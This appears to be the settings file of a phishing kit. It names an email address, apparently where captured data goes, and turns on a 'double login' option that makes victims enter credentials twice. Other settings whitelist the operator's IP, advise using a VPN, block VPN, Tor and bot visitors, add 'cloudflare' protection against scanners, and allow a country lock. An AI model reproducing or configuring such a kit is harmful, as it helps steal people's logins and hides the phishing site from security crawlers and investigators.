
Email = "cvicle67@yandex.com"

; Double login
; Options: on or off

LoginTwice = "on"

; Whitelist your IP
; Use a VPN / Proxy !
; Options: IP or off

MyIP = "10.0.2.15"

; Proxy, Hosting, Tor detection
; Options: on or off

VPN = "on"

; Proxy, Hosting, Tor detection
; Not 100% reliable though
; Options: on or off

HeuristicVPN = "on"

; Special "cloudflare" protection
; will block 99% of bots in theory
; Options: on or off

CFProtection = "on"

; Allow access to a specific country
; Options: country code or off

CountryLock = "off"